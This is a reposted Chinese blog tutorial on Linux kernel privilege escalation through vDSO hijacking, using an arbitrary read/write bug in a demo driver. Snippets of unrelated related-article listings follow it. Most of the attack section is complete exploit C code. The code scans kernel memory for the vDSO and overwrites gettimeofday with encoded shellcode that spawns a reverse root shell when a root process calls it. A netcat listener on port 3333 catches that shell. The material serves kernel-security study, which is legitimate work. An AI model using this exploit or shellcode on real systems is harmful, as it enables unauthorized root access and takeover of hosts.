linux 内核提权总结(demo+exp分析) -- 任意读写(二)

2024-09-08 10:38

本文主要是介绍linux 内核提权总结(demo+exp分析) -- 任意读写(二),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

hijack_vdso篇

本文转自网络文章,内容均为非盈利,版权归原作者所有。
转载此文章仅为个人收藏,分享知识,如有侵权,马上删除。
原文作者:jmpcall
专栏地址:https://zhuanlan.kanxue.com/user-815036.htm

 

 

  • vdso: 内核实现的一个动态库,存在于内核,然后映射到用户态空间,可由用户态直接调用

    1. 内核中的vdso如果被修改,那么用户态空间的vdso也会同步被修改
  • 攻击流程

    1. (内核任意代码执行漏洞)内核调用set_memory_rw 函数修改内核vdso页面属性,使得用户态可以直接修改vdso,劫持vdso为shellcode,触发条件同1
    2. (内核任意读写漏洞)内核修改内核vdso数据,写入shellcode,使得用户态vdso中函数被劫持,当高权限进程调用vdso中特定函数时,触发shellcode,本篇只讲解攻击流程2

一. 利用步骤

1. 定位内核态vdso位置

  • vdso中存在一些比较有特点的字符串,比如"gettimeofday",在拥有任意读漏洞的前提下,从0xffffffff80000000(开启kaslr后内核基地址在此地址基础上往上偏移)开始按页搜索内存

  • 如果内存其他地方存在"gettimeofday"字符串,且出现在vdso之前,则会返回错误地址。所以在内存搜索时,应以返回地址为起始,使用gdb dump 0x2000 内存,使用ida查看是否是vdso,如果不是,可以忽略这个错误地址,继续向下搜索。

  • 得到真正的vdso后,查看"gettimeofday"与vdso起始地址的偏移,后续匹配vdso时,加上这个偏移条件

2. 向内核中vdso写入shellcode

  • shellcode功能: 判断进程是否具有root权限,如果成立,则开辟新进程用来反弹root shell

  • shellcode写入位置: 定位vdso上某函数,比如gettimeofday函数,使用shellcode覆盖

  • shellcode触发条件: 当高权限进程调用gettimeofday函数时,自动执行shellcode 反弹root shell

二. 驱动代码

见cred篇:linux 内核提权总结(demo+exp分析) -- 任意读写(一)

三. exp

#define _GNU_SOURCE#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <sys/auxv.h>#define CHANGE_POINT 0x100000
#define RW_READ 0x100001
#define RW_WRITE 0x100002
#define SET_MEM 0X100003struct vunl
{char *point;size_t size;
} VUNL;char shellcode[] =  "\x90\x53\x48\x31\xC0\xB0\x66\x0F\x05\x48\x31\xDB\x48\x39\xC3\x75""\x0F\x48\x31\xC0\xB0\x39\x0F\x05\x48\x31\xDB\x48\x39\xD8\x74\x09""\x5B\x48\x31\xC0\xB0\x60\x0F\x05\xC3\x48\x31\xD2\x6A\x01\x5E\x6A""\x02\x5F\x6A\x29\x58\x0F\x05\x48\x97\x50\x48\xB9\xFD\xFF\xF2\xFA""\x80\xFF\xFF\xFE\x48\xF7\xD1\x51\x48\x89\xE6\x6A\x10\x5A\x6A\x2A""\x58\x0F\x05\x48\x31\xDB\x48\x39\xD8\x74\x07\x48\x31\xC0\xB0\xE7""\x0F\x05\x90\x6A\x03\x5E\x6A\x21\x58\x48\xFF\xCE\x0F\x05\x75\xF6""\x48\x31\xC0\x50\x48\xBB\xD0\x9D\x96\x91\xD0\x8C\x97\xFF\x48\xF7""\xD3\x53\x48\x89\xE7\x50\x57\x48\x89\xE6\x48\x31\xD2\xB0\x3B\x0F""\x05\x48\x31\xC0\xB0\xE7\x0F\x05";char *leak_data(int fd, char *buf)
{char *res = NULL;VUNL.size = 0x1000;for (size_t addr = 0xffffffff80000000; addr < 0xffffffffffffffff; addr += 0x1000){VUNL.point = (char *)addr;ioctl(fd, CHANGE_POINT, &VUNL); //change the pointioctl(fd, RW_READ, buf);printf("addr is: %p, context is: 0x%lx\n", VUNL.point, *(size_t *)buf);if (!strcmp("gettimeofday", buf + 0x2b5)){res = (char *)addr;break;}puts("[-] not found, try again!\n");}return res;
}int check_vdso_shellcode()
{size_t addr = 0;addr = getauxval(AT_SYSINFO_EHDR);if (addr < 0){puts("[-] can not get VDSO addr\n");return 0;}printf("[+] usr::VDSO addr is: 0x%lx\n", addr);if (memmem((char *)addr, 0x1000, shellcode, strlen(shellcode))){return 1;}return 0;
}int main()
{int fd = 0;char *buf = malloc(0x1000);fd = open("/dev/rw_any_dev", O_RDWR);VUNL.point = (char *)leak_data(fd, buf);VUNL.size = strlen(shellcode);VUNL.point = VUNL.point + 0xb00;ioctl(fd, CHANGE_POINT, &VUNL);ioctl(fd, RW_WRITE, shellcode);printf("[+] hook in %p\n", VUNL.point);if (check_vdso_shellcode()){puts("[+] the shellcode has hook in VDSO");system("nc -lp 3333");}else{puts("[-] error!");}return 0;
}

 

这篇关于linux 内核提权总结(demo+exp分析) -- 任意读写(二)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1147880

相关文章

HarmonyOS学习(七)——UI(五)常用布局总结

自适应布局 1.1、线性布局(LinearLayout) 通过线性容器Row和Column实现线性布局。Column容器内的子组件按照垂直方向排列,Row组件中的子组件按照水平方向排列。 属性说明space通过space参数设置主轴上子组件的间距,达到各子组件在排列上的等间距效果alignItems设置子组件在交叉轴上的对齐方式,且在各类尺寸屏幕上表现一致,其中交叉轴为垂直时,取值为Vert

10. 文件的读写

10.1 文本文件 操作文件三大类: ofstream:写操作ifstream:读操作fstream:读写操作 打开方式解释ios::in为了读文件而打开文件ios::out为了写文件而打开文件,如果当前文件存在则清空当前文件在写入ios::app追加方式写文件ios::trunc如果文件存在先删除,在创建ios::ate打开文件之后令读写位置移至文件尾端ios::binary二进制方式

linux-基础知识3

打包和压缩 zip 安装zip软件包 yum -y install zip unzip 压缩打包命令: zip -q -r -d -u 压缩包文件名 目录和文件名列表 -q:不显示命令执行过程-r:递归处理,打包各级子目录和文件-u:把文件增加/替换到压缩包中-d:从压缩包中删除指定的文件 解压:unzip 压缩包名 打包文件 把压缩包从服务器下载到本地 把压缩包上传到服务器(zip

学习hash总结

2014/1/29/   最近刚开始学hash,名字很陌生,但是hash的思想却很熟悉,以前早就做过此类的题,但是不知道这就是hash思想而已,说白了hash就是一个映射,往往灵活利用数组的下标来实现算法,hash的作用:1、判重;2、统计次数;

性能分析之MySQL索引实战案例

文章目录 一、前言二、准备三、MySQL索引优化四、MySQL 索引知识回顾五、总结 一、前言 在上一讲性能工具之 JProfiler 简单登录案例分析实战中已经发现SQL没有建立索引问题,本文将一起从代码层去分析为什么没有建立索引? 开源ERP项目地址:https://gitee.com/jishenghua/JSH_ERP 二、准备 打开IDEA找到登录请求资源路径位置

Linux 网络编程 --- 应用层

一、自定义协议和序列化反序列化 代码: 序列化反序列化实现网络版本计算器 二、HTTP协议 1、谈两个简单的预备知识 https://www.baidu.com/ --- 域名 --- 域名解析 --- IP地址 http的端口号为80端口,https的端口号为443 url为统一资源定位符。CSDNhttps://mp.csdn.net/mp_blog/creation/editor

【Python编程】Linux创建虚拟环境并配置与notebook相连接

1.创建 使用 venv 创建虚拟环境。例如,在当前目录下创建一个名为 myenv 的虚拟环境: python3 -m venv myenv 2.激活 激活虚拟环境使其成为当前终端会话的活动环境。运行: source myenv/bin/activate 3.与notebook连接 在虚拟环境中,使用 pip 安装 Jupyter 和 ipykernel: pip instal

Android实现任意版本设置默认的锁屏壁纸和桌面壁纸(两张壁纸可不一致)

客户有些需求需要设置默认壁纸和锁屏壁纸  在默认情况下 这两个壁纸是相同的  如果需要默认的锁屏壁纸和桌面壁纸不一样 需要额外修改 Android13实现 替换默认桌面壁纸: 将图片文件替换frameworks/base/core/res/res/drawable-nodpi/default_wallpaper.*  (注意不能是bmp格式) 替换默认锁屏壁纸: 将图片资源放入vendo

内核启动时减少log的方式

内核引导选项 内核引导选项大体上可以分为两类:一类与设备无关、另一类与设备有关。与设备有关的引导选项多如牛毛,需要你自己阅读内核中的相应驱动程序源码以获取其能够接受的引导选项。比如,如果你想知道可以向 AHA1542 SCSI 驱动程序传递哪些引导选项,那么就查看 drivers/scsi/aha1542.c 文件,一般在前面 100 行注释里就可以找到所接受的引导选项说明。大多数选项是通过"_